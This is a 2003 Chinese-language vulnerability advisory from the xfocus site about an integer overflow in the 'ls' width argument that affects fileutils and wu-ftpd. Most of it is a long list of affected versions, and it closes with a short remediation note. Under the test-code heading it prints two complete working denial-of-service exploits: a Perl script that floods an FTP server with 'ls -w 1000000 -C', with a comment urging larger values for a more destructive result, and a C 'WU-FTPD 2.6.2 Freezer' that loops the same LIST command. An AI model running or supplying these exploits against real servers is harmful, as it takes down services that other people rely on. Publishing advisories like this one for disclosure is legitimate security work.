xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Coreutils ls命令宽度超长参数整数溢出漏洞


发布时间:2003-10-22
更新时间:2003-11-03
严重程度:
威胁程度:远程拒绝服务
错误类型:边界检查错误
利用方式:服务器模式

BUGTRAQ ID:8875

受影响系统
GNU fileutils 4.0                                  
   +Debian Linux 2.2 68k                          
   +Debian Linux 2.2 alpha                        
   +Debian Linux 2.2 arm                          
   +Debian Linux 2.2 IA-32                        
   +Debian Linux 2.2 powerpc                      
   +Debian Linux 2.2 sparc                        
   +Immunix Immunix OS 7+                          
   +RedHat Linux 6.2                              
   +RedHat Linux 6.2 i386                          
   +RedHat Linux 7.0                              
   +RedHat Linux 7.0 i386                          
   +Slackware Linux 7.0                            
   +Slackware Linux 7.1                            
GNU fileutils 4.0.36                              
   +RedHat Linux 7.1                              
   +RedHat Linux 7.1 i386                          
   +RedHat Linux for iSeries 7.1                  
   +RedHat Linux for pSeries 7.1                  
GNU fileutils 4.1                                  
   +Caldera OpenLinux Server 3.1                  
   +Caldera OpenLinux Server 3.1.1                
   +Caldera OpenLinux Workstation 3.1              
   +Caldera OpenLinux Workstation 3.1.1            
   +RedHat Linux 7.2                              
   +RedHat Linux 7.2 alpha                        
   +RedHat Linux 7.2 i386                          
   +RedHat Linux 7.2 ia64                          
   +RedHat Linux 7.3                              
   +RedHat Linux 7.3 i386                          
   +S.u.S.E. Linux 7.0 alpha                      
   +S.u.S.E. Linux 7.0 i386                        
   +S.u.S.E. Linux 7.0 ppc                        
   +S.u.S.E. Linux 7.0 sparc                      
   +S.u.S.E. Linux 7.1 alpha                      
   +S.u.S.E. Linux 7.1 ppc                        
   +S.u.S.E. Linux 7.1 sparc                      
   +S.u.S.E. Linux 7.1 x86                        
   +S.u.S.E. Linux 7.2 i386                        
   +S.u.S.E. Linux 7.3 i386                        
   +S.u.S.E. Linux 7.3 ppc                        
   +S.u.S.E. Linux 7.3 sparc                      
   +Slackware Linux 8.0                            
   +Sun Cobalt Qube 3                              
   +Sun Cobalt RaQ 4                              
   +Sun Cobalt RaQ 550                            
   +Sun Cobalt RaQ XTR                            
   +Sun Linux 5.0                                  
   +Sun Linux 5.0.3                                
   +Sun Linux 5.0.5                                
   +Sun Linux 5.0.6                                
   +Sun LX50                                      
   +Trustix Secure Linux 1.1                      
   +Trustix Secure Linux 1.2                      
   +Trustix Secure Linux 1.5                      
GNU fileutils 4.1.6                                
   +Sun Linux 5.0.6                                
GNU fileutils 4.1.7                                
Washington University wu-ftpd 2.4.1                
Washington University wu-ftpd 2.4.2 academ[BETA1-15
   +Caldera OpenLinux Standard 1.2                
Washington University wu-ftpd 2.4.2 academ[BETA-18]
   +RedHat Linux 5.2 i386                          
Washington University wu-ftpd 2.4.2 VR17          
Washington University wu-ftpd 2.4.2 VR16          
Washington University wu-ftpd 2.4.2 (beta 18) VR9  
Washington University wu-ftpd 2.4.2 (beta 18) VR8  
Washington University wu-ftpd 2.4.2 (beta 18) VR7  
Washington University wu-ftpd 2.4.2 (beta 18) VR6  
Washington University wu-ftpd 2.4.2 (beta 18) VR5  
Washington University wu-ftpd 2.4.2 (beta 18) VR4  
Washington University wu-ftpd 2.4.2 (beta 18) VR15
Washington University wu-ftpd 2.4.2 (beta 18) VR14
Washington University wu-ftpd 2.4.2 (beta 18) VR13
Washington University wu-ftpd 2.4.2 (beta 18) VR12
Washington University wu-ftpd 2.4.2 (beta 18) VR11
Washington University wu-ftpd 2.4.2 (beta 18) VR10
Washington University wu-ftpd 2.5 .0              
   +Caldera OpenLinux 2.4                          
   +Caldera OpenLinux Desktop 2.3                  
   +RedHat Linux 6.0                              
   +RedHat Linux 6.0 alpha                        
   +RedHat Linux 6.0 sparc                        
   +SCO eDesktop 2.4                              
   +SCO eServer 2.3                                
   +SCO eServer 2.3.1                              
Washington University wu-ftpd 2.6 .0              
   +Cobalt Qube 1.0                                
   +Conectiva Linux 4.0                            
   +Conectiva Linux 4.0 es                        
   +Conectiva Linux 4.1                            
   +Conectiva Linux 4.2                            
   +Conectiva Linux 5.0                            
   +Conectiva Linux 5.1                            
   +Debian Linux 2.2                              
   +Debian Linux 2.2 68k                          
   +Debian Linux 2.2 alpha                        
   +Debian Linux 2.2 arm                          
   +Debian Linux 2.2 powerpc                      
   +Debian Linux 2.2 sparc                        
   -FreeBSD FreeBSD 4.3                            
   -FreeBSD FreeBSD 4.3 -RELEASE                  
   -FreeBSD FreeBSD 4.3 -STABLE                    
   -FreeBSD FreeBSD 4.4                            
   +HP HP-UX 11.0                                  
   +HP HP-UX 11.11                                
   +RedHat Linux 5.2 alpha                        
   +RedHat Linux 5.2 i386                          
   +RedHat Linux 5.2 sparc                        
   +RedHat Linux 6.0                              
   +RedHat Linux 6.0 alpha                        
   +RedHat Linux 6.0 sparc                        
   +RedHat Linux 6.1 alpha                        
   +RedHat Linux 6.1 i386                          
   +RedHat Linux 6.1 sparc                        
   +RedHat Linux 6.2 alpha                        
   +RedHat Linux 6.2 i386                          
   +RedHat Linux 6.2 sparc                        
   +S.u.S.E. Linux 6.1                            
   +S.u.S.E. Linux 6.1 alpha                      
   +S.u.S.E. Linux 6.2                            
   +S.u.S.E. Linux 6.3                            
   +S.u.S.E. Linux 6.3 alpha                      
   +S.u.S.E. Linux 6.3 ppc                        
   +S.u.S.E. Linux 6.4                            
   +S.u.S.E. Linux 6.4 alpha                      
   +S.u.S.E. Linux 6.4 ppc                        
   +S.u.S.E. Linux 7.0 alpha                      
   +S.u.S.E. Linux 7.0 i386                        
   +S.u.S.E. Linux 7.0 ppc                        
   +S.u.S.E. Linux 7.0 sparc                      
   +S.u.S.E. Linux 7.1 alpha                      
   +S.u.S.E. Linux 7.1 ppc                        
   +S.u.S.E. Linux 7.1 sparc                      
   +S.u.S.E. Linux 7.1 x86                        
   +S.u.S.E. Linux 7.2 i386                        
   +S.u.S.E. Linux 7.3 i386                        
   +S.u.S.E. Linux 7.3 ppc                        
   +S.u.S.E. Linux 7.3 sparc                      
   +TurboLinux Turbo Linux 4.0                    
   +Wirex Immunix OS 6.2                          
Washington University wu-ftpd 2.6.1                
   +Caldera OpenLinux 2.3                          
   +Caldera OpenLinux Server 3.1                  
   +Cobalt Qube 1.0                                
   +Conectiva Linux 6.0                            
   +Conectiva Linux 7.0                            
   +Conectiva Linux 8.0                            
   -FreeBSD FreeBSD 4.3                            
   -FreeBSD FreeBSD 4.3 -RELEASE                  
   -FreeBSD FreeBSD 4.3 -STABLE                    
   -FreeBSD FreeBSD 4.4                            
   -FreeBSD FreeBSD 5.0                            
   -FreeBSD FreeBSD 5.0 alpha                      
   +MandrakeSoft Corporate Server 1.0.1            
   +MandrakeSoft Linux Mandrake 6.0                
   +MandrakeSoft Linux Mandrake 6.1                
   +MandrakeSoft Linux Mandrake 7.0                
   +MandrakeSoft Linux Mandrake 7.1                
   +MandrakeSoft Linux Mandrake 7.2                
   +MandrakeSoft Linux Mandrake 8.0                
   +MandrakeSoft Linux Mandrake 8.0 ppc            
   +MandrakeSoft Linux Mandrake 8.1                
   +RedHat Linux 7.0 alpha                        
   +RedHat Linux 7.0 i386                          
   +RedHat Linux 7.0 sparc                        
   +RedHat Linux 7.1 alpha                        
   +RedHat Linux 7.1 i386                          
   +RedHat Linux 7.1 i586                          
   +RedHat Linux 7.1 i686                          
   +RedHat Linux 7.1 ia64                          
   +RedHat Linux 7.1 noarch                        
   +RedHat Linux 7.2 alpha                        
   +RedHat Linux 7.2 athlon                        
   +RedHat Linux 7.2 i386                          
   +RedHat Linux 7.2 i586                          
   +RedHat Linux 7.2 i686                          
   +RedHat Linux 7.2 ia64                          
   +RedHat Linux 7.2 noarch                        
   -S.u.S.E. Linux 7.0                            
   -S.u.S.E. Linux 7.0 alpha                      
   -S.u.S.E. Linux 7.0 ppc                        
   -S.u.S.E. Linux 7.0 sparc                      
   -S.u.S.E. Linux 7.1                            
   -S.u.S.E. Linux 7.1 alpha                      
   -S.u.S.E. Linux 7.1 ppc                        
   -S.u.S.E. Linux 7.1 sparc                      
   -S.u.S.E. Linux 7.1 x86                        
   -S.u.S.E. Linux 7.2                            
   -S.u.S.E. Linux 7.3                            
   +SCO eDesktop 2.4                              
   +SCO eServer 2.3.1                              
   +SCO Open Server 5.0                            
   +SCO Open Server 5.0.1                          
   +SCO Open Server 5.0.2                          
   +SCO Open Server 5.0.3                          
   +SCO Open Server 5.0.4                          
   +SCO Open Server 5.0.5                          
   +SCO Open Server 5.0.6                          
   +SCO Open Server 5.0.6 a                        
   -Slackware Linux 7.0                            
   -Slackware Linux 7.1                            
   -Slackware Linux 8.0                            
   +TurboLinux TL Workstation 6.1                  
   +TurboLinux Turbo Linux 6.0                    
   +TurboLinux Turbo Linux 6.0.1                  
   +TurboLinux Turbo Linux 6.0.2                  
   +TurboLinux Turbo Linux 6.0.3                  
   +TurboLinux Turbo Linux 6.0.4                  
   +TurboLinux Turbo Linux 6.0.5                  
   +Wirex Immunix OS 7+                            
   +Wirex Immunix OS 7.0                          
   +Wirex Immunix OS 7.0 -Beta                    
Washington University wu-ftpd 2.6.2                
   +Compaq Tru64 4.0 b                            
   +Compaq Tru64 4.0 d                            
   +Compaq Tru64 4.0 d PK9 (BL17)                  
   +Compaq Tru64 4.0 e                            
   +Compaq Tru64 4.0 f                            
   +Compaq Tru64 4.0 f PK6 (BL17)                  
   +Compaq Tru64 4.0 f PK7 (BL18)                  
   +Compaq Tru64 4.0 g                            
   +Compaq Tru64 4.0 g PK3 (BL17)                  
   +Compaq Tru64 5.0                              
   +Compaq Tru64 5.0 PK4 (BL17)                    
   +Compaq Tru64 5.0 PK4 (BL18)                    
   +Compaq Tru64 5.0 a                            
   +Compaq Tru64 5.0 a PK3 (BL17)                  
   +Compaq Tru64 5.0 f                            
   +Compaq Tru64 5.1                              
   +Compaq Tru64 5.1 PK3 (BL17)                    
   +Compaq Tru64 5.1 PK4 (BL18)                    
   +Compaq Tru64 5.1 PK5 (BL19)                    
   +Compaq Tru64 5.1 PK6 (BL20)                    
   +Compaq Tru64 5.1 a                            
   +Compaq Tru64 5.1 a PK1 (BL1)                  
   +Compaq Tru64 5.1 a PK2 (BL2)                  
   +Compaq Tru64 5.1 a PK3 (BL3)                  
   +Compaq Tru64 5.1 a PK4 (BL21)                  
   +Compaq Tru64 5.1 a PK5 (BL23)                  
   +Compaq Tru64 5.1 b                            
   +Compaq Tru64 5.1 b PK1 (BL1)                  
   +Compaq Tru64 5.1 b PK2 (BL22)                  
   +Conectiva Linux 9.0                            
   +Debian Linux 3.0                              
   +Debian Linux 3.0 alpha                        
   +Debian Linux 3.0 arm                          
   +Debian Linux 3.0 hppa                          
   +Debian Linux 3.0 ia-32                        
   +Debian Linux 3.0 ia-64                        
   +Debian Linux 3.0 m68k                          
   +Debian Linux 3.0 mips                          
   +Debian Linux 3.0 mipsel                        
   +Debian Linux 3.0 ppc                          
   +Debian Linux 3.0 s/390                        
   +Debian Linux 3.0 sparc                        
   +MandrakeSoft Linux Mandrake 8.2                
   +MandrakeSoft Linux Mandrake 8.2 ppc            
   +Sun Linux 5.0.7                                
Washington University wu-ftpd 2.6.2                
   +TurboLinux TL Advanced Server 6.0              
   +TurboLinux TL Server 6.1                      
   +TurboLinux TL Workstation 6.0
详细描述
Coreutils 'ls'命令实现上存在整数溢出问题,当程序处理宽度和列数命令行参数时存在漏洞,当处理超长的参数时会导致整数溢出,溢出后的整数值可能使程序发生非预期的行为。其他调用'ls'命令的软件可能因此导致拒绝服务攻击。

测试代码
#!/usr/bin/perl

# DoS sploit for ls
# tested against wu-ftpd 2.6.2

# coded by (c) druid
# greets to viator

use Net::FTP;

(($target = $ARGV[0])&&($count = $ARGV[1])) || die "usage:$0 <target> <count>";
my $user = "anonymous";
my $pass = "halt\@xyu.com";
$cols=1000000;#you can increase this value for more destructive result ;)


print ":: Trying to connect to target system at: $target...\n"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect: $!";
print "Connected!\n";
$ftp->login($user, $pass) || die "could not login: $!";
print "Logged in!\n";
$ftp->cwd("/");
while ($count)
{
$ftp->ls("-w $cols -C");
$count--;
}
print "Done!\n";
$ftp->quit;

/*
*
*                 http://www.rosiello.org
*                  (c) Rosiello Security
*
* Copyright Rosiello Security 2003
* All Rights reserved.
*
* Tested on Red Hat 9.0
*
* Author: Angelo Rosiello
* Mail  : angelo@rosiello.org
* URL   : http://www.rosiello.org
*
* This software is only for educational purpose.
* Do not use it against machines different from yours.
* Respect law.
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>

void addr_initialize( );
void usage( );

int main( int argc, char **argv )
{
        int i, sd, PORT, loop, error;
        char user[30], password[30], ch;
        struct sockaddr_in server_addr;

        fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
        fprintf( stdout, "http://www.rosiello.org\n" );
        fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );

        if( argc != 6 ) usage( argv[0] );

        if( strlen( argv[3] ) > 20 ) exit( 0 );
        if( strlen( argv[4] ) > 20 ) exit( 0 );

        sprintf( user, "USER %s\n", argv[3] );
        sprintf( password, "PASS %s\n", argv[4] );

        PORT = atoi( argv[2] );
        loop = atoi( argv[5] );

        addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
        sd = socket( AF_INET, SOCK_STREAM, 0 );

        error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
        if( error != 0 )
        {
                perror( "Something wrong with the connection" );
                exit( 0 );
        }

        while ( ch != '\n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }

        ch = '\0';

        printf( "Connection executed, now waiting to log in...\n" );

        printf( "%s", user );

        send( sd, user, strlen( user ), 0 );
        while ( ch != '\n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }
        printf( "%s", password );

        ch = '\0';

        send( sd, password, strlen( password ), 0 );
        while ( ch != '\n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }

        printf( "Sending the DoS query\n" );
        for( i=0; i<loop; i++ )
        {
                write( sd, "LIST -w 1000000 -C\n", 19 );
        }
        printf( "All done\n" );
        close( sd );
        return 0;
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
        address -> sin_family = AF_INET;
        address -> sin_port = htons((u_short)port);
        address -> sin_addr.s_addr = IPaddr;
}

void usage( char *program )
{
        fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program);
        exit(0);
}

解决方案
各厂商已经在最新版本的fileutils软件包中修补了此漏洞。

相关信息
WU-FTPD 2.6.2 Freezer
http://archives.neohapsis.com/archives/bugtraq/2003-10/0331.html